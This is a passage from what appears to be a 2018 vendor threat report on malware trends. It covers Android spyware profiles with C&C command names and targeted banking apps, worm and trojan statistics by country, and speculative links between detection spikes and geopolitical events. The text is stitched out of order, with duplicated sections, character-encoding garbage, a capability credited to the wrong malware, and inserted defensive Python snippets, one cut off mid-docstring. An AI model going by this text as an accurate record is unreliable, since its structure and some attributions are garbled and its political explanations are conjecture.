Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.

8 Conclusions

In Q2 Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

Brought to you by

In addition to the abilities of previous versions, it includes some additional tricks:

Extracts photos, audio and video

Records the screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Disguises of MikeSpy: Virtual Girlfriend

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

Takes control of the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp message DB and related keys

Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Disguises of Xloader: Version-1 to Version-3, Facebook, Chrome

After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contact details

Set Wi-Fi to always on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable the Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in line is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

Disguises of Stalker Spy (app distribution): FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it "a spy with a 007 license".

Disguises of Mystery Bot: Version 1, Adobe Flash Player; Version 2, Flash Player

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:

Send_SMS - extract SMS content and send it to the C&C server

Send_USSD - send the USSD to the C&C server

Gethistory - monitor browser history

Start_AllApp - gather info about installed applications

Send_call - set the Intent action to call

Forward_call - forward incoming calls

ResForward_call - reset call forwarding

Go_Smsmnd - delete SMS content

Go_GetAlls - get SMS history

Dell_sms - delete SMS content in a conversation

Send_spam - send spam SMS

Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

Disguises of FakeSpy: 佐川急便, 현대캐피탈

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts - Get contact details and email id

Mute - Set action to mute

Mms - Get MMS content

info - Get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Disguises of RedAlert: Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber; Version 2: Update Google Market, Flash Player, Tactic, FlashLight

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party play stores, social networks and messengers for spreading.

Disguises of Hero Rat (Version 1): CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram, Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Disguises of Sonvpay (Version 1): Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Disguises of CoinHive: Version-1: Netflix Hack, Instagram Hack; Version-2: TSF Launcher; Version-3: Android Service, PlacarTv Futebol Ao Vivo

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April (chart)

4.2.2 May 2018

Android-targeted malware in May (chart)

4.2.3 June 2018

Android-targeted malware in June (chart)

5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
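As an added example, not from the report or from Comodo, here is a Python check for the three packing signals this passage describes: stock UPX section names, a section that is empty on disk but reserved in memory for the unpacked code, and a high-entropy compressed section. It parses the PE section table directly and runs against constructed in-memory images (the sample layouts and the pseudo-random "compressed" body are assumptions for the demo, not real samples), so a modified UPX build that renames its sections is still caught by the two structural signals.

```python
import math
import random
import struct
from typing import Dict, List, Tuple

# Section names written by stock UPX; a modified build (MUPX) may rename them,
# so the two structural signals below are checked as well.
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b".UPX0", b".UPX1"}
HIGH_ENTROPY = 7.0  # bits per byte; compressed or encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> List[Tuple[bytes, int, int, bytes]]:
    """Walk the PE section table; returns (name, virtual_size, raw_size, raw_bytes)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                  # IMAGE_FILE_HEADER (20 bytes)
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_header_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_header_size                  # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                             # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0")
        vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        sections.append((name, vsize, raw_size, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def assess(pe: bytes) -> Dict[str, object]:
    """Collect packing signals from the section table and return a verdict."""
    signals, findings = set(), []
    for name, vsize, raw_size, raw in parse_sections(pe):
        label = name.decode("ascii", errors="replace")
        if name in UPX_SECTION_NAMES:
            signals.add("upx_name")
            findings.append(f"{label}: stock UPX section name")
        if raw_size == 0 and vsize >= 0x1000:
            # Empty on disk but large in memory: the stub unpacks into this space at
            # run time. A plain .bss looks the same, so on its own this is weak.
            signals.add("reserved_empty")
            findings.append(f"{label}: no raw data, {vsize:#x} bytes reserved in memory")
        elif raw_size:
            ent = shannon_entropy(raw)
            if ent > HIGH_ENTROPY:
                signals.add("high_entropy")
                findings.append(f"{label}: entropy {ent:.2f} bits/byte")
    likely = "upx_name" in signals or {"reserved_empty", "high_entropy"} <= signals
    return {"likely_packed": likely, "signals": sorted(signals), "findings": findings}


def build_sample_pe(layout: List[Tuple[bytes, int, bytes]]) -> bytes:
    """Construct a minimal PE32 image (optional header size 0) from (name, vsize, raw) triples."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                    # e_lfanew -> "PE\0\0"
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 0, 0x0102)
    raw_ptr = 64 + 4 + 20 + 40 * len(layout)                 # first byte after the headers
    vaddr, table, body = 0x1000, b"", b""
    for name, vsize, raw in layout:
        table += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", vsize, vaddr, len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, 0)
        body += raw
        raw_ptr += len(raw)
        vaddr += max(vsize, len(raw), 0x1000)
    return bytes(dos) + b"PE\0\0" + coff + table + body


def constructed_samples() -> Dict[str, bytes]:
    """Three in-memory test images; the 'compressed' payload is deterministic pseudo-random bytes."""
    rng = random.Random(1)
    blob = bytes(rng.getrandbits(8) for _ in range(4096))   # stand-in for a compressed body
    return {
        # Stock UPX layout: UPX0 is empty on disk and reserved for the unpacked code.
        "stock_upx": build_sample_pe([(b"UPX0", 0x8000, b""), (b"UPX1", 0x1000, blob),
                                      (b".rsrc", 0x100, b"\0" * 64)]),
        # Same layout with the tell-tale names scrubbed, as a modified packer would do.
        "renamed": build_sample_pe([(b".text0", 0x8000, b""), (b".text1", 0x1000, blob)]),
        # Ordinary small program: low-entropy code and data, nothing reserved.
        "benign": build_sample_pe([(b".text", 0x200, b"\x90" * 200 + b"\xc3"),
                                   (b".data", 0x40, b"hello, world\0" * 4)]),
    }


if __name__ == "__main__":
    for title, image in constructed_samples().items():
        print(title, assess(image))
```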

In Q2 2018, Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

Global Threat Report Q2 2018 Edition

Page 67 of 73

75 Armenia

All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018

Global Threat Report Q2 2018 Edition

Page 68 of 73

76 Belarus

A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society

Global Threat Report Q2 2018 Edition

Page 69 of 73

77 Iraq

Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls

Global Threat Report Q2 2018 Edition

Page 70 of 73

78 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26

Global Threat Report Q2 2018 Edition

Page 71 of 73

79 Croatia

Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo

Global Threat Report Q2 2018 Edition

Page 72 of 73

710 Finland Russia USA

Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
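Every timeline in this section is read by eye for its single largest day. The Python function below is an added example, not Comodo's code: it applies a robust rolling baseline (median and median absolute deviation of the preceding days) to a series of daily detection counts so that a spike like the ones described above is flagged automatically rather than by inspection. The counts in SAMPLE_COUNTS are constructed sample data, not Comodo telemetry, and the window, threshold and function names are this example's own choices.

```python
"""Robust spike detection over a daily malware-detection series.

Added example, not Comodo's code. The baseline for each day is the median
of the preceding `window` days and the spread is the scaled median absolute
deviation (MAD), so one enormous day does not inflate the baseline used to
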